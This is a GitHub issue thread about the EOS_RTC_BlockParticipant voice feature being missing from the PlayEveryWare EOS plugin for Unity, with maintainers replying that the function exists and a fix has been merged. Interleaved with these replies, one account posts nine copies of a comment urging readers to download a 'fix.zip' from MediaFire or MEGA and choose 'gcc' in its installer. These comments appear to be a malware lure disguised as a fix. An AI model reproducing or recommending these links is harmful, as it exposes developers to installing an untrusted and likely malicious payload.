### ISSUE TITLE
(Voice/Audio) EOS_RTC_BlockParticipant seems to be missing from this plugin

### ISSUE THREAD

**Issue by Ermelious** [PlayEveryWare/eos_plugin_for_unity#852]
**Is your feature request related to a problem? Please describe.**
I'm trying to add in the feature to Block a specified remote participant in the Lobby in the voice channel. The functionality seems to be missing, I don't see it in EOSLobbyManager nor RTCAudioInterface.

Here's the functionality:
https://dev.epicgames.com/docs/api-ref/functions/eos-rtc-block-participant
It's from:
https://dev.epicgames.com/docs/game-services/real-time-communication-interface/voice/using-voice
In the Mute section.
From my understanding, with BlockParticipant, each lobby member have the power to block any member in the Lobby that they do not want to hear or converse with. I'm not sure if this would apply to everyone or for themselves only. E.g if Participant A blocks Participant B, will Participant C still hear Participant B?

May I check where or how do I access BlockParticipant? Or is it missing because Playeveryware is on an older version of the SDK that does not have this feature? 

**Describe the solution you'd like**
To be able to call the BlockParticipant feature which seems to be in the EOS C# SDK as seen in the document.

**Additional context**
![image](https://github.com/user-attachments/assets/aac5056c-7086-414c-8c48-4558a7fa042f)

**Comment by paulhazen** [comment]
Hi @Ermelious. I'll look into this and get back to you soon regarding how to add this functionality - and with an estimate of when we might have this functionality baked into the released version of the plugin.

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by arthur740212** [comment]
Hello, it looks like the ticket is reopened.
I do remember responding to this ticket that the BlockParticipant lives in RTCInterface.
Were you able to find the function and use it?

**Comment by paulhazen** [comment]
Hey @Ermelious - just for context and clarity: We have "resolved" this issue in that the PR you opened that addressed the issue _was_ merged into the `development` branch, however in keeping with GitHub best practices, etc. We are leaving it marked "open" until it is merged into the `stable` branch.
